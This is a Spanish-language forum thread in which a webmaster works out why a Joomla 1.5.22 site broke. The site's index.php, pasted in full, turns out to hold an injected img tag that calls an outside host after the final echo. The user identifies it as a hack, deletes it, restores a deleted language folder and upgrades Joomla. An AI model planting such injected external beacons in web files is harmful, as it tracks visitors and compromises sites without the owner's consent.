Problemas con CMS Joomla1.5.22: ¿Cómo solucionarlos?

  • Autor Autor juliofranco
  • Fecha de inicio Fecha de inicio

juliofranco

Eta
Social Media
Verificado por Whatsapp
Bueno quiero comentarles que desde hace muy poco empeze a ensayar con el CMS Joomla1.5.22, he tenido muchos problemas y me ha parecido que es un poco dificil.
Bueno vengo por que en este momento tengo un problema en el index que no se que rayos fue lo que paso, solo publique un articulos y a la hora ya no servia para nada el index este es el error
Enlace eliminado
Parse error: syntax error, unexpected '<' in /homepages/13/d336892347/htdocs/MMMEnvigado.org/index.php on line 89

Bueno ahora que estuve googliando buscando una solucion, regreso al administrator, sale un error nuevo algo inusual que es
Enlace eliminado
JFolder::folder: Path is not a folder
DESCUSEVALIDLOGIN

Puedo iniciar sesion normalmente pero ahora el sitio solo aparece en ingles y el estaba en español.
Bueno y ahora que hago : (
 
Si, el problema surgio el dia de ayer a la 1pm
 
Trata cerrando lo siguiente Parse error: syntax error, unexpected '<' in /homepages/13/d336892347/htdocs/MMMEnvigado.org/index.php on line 89

< asi >
 
Como dice el mensaje anterior tienes un error de sintaxis en el código, se ve que falta cerrar el < en la linea 89 del index.php
 
Bueno lo raro es que yo no he tocado el index para nada y he revisado ya y no veo el problema a continuacion coloco mi index.php
HTML:
<?php
/**
* @version		$Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=15943122">

Bueno segui buscando en el foro en ingles y me encontre que despues de
Insertar CODE, HTML o PHP:
echo JResponse::toString($mainframe->getCfg('gzip'));
no debe ir mas codigo, bueno en conclusion me han hackeado
Insertar CODE, HTML o PHP:
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=15943122">
Lo elimine y de nuevo estoy online
Gracias

Bueno aun no se porque esta mi joomla en ingles
sigue loco

Ya identifique el problema, me eliminaron la carpeta lenguaje del administrator, lo solucione descargando de nuevo joomla y resubiendo los archivos eliminados, a y tambien actualice la version a 1.5.23.